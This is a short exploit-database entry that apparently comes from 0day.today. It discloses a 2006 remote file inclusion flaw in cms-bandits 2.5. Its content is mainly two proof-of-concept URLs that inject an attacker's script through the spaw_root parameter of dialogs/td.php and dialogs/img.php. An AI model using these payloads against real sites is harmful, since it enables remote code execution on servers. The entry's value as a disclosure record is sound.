[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities

Author
Federico Fazzi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-500
Category
web applications
Date add
07-06-2006
Platform
unsorted
===============================================================
cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities
===============================================================



# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]




#  0day.today [2024-12-25]  #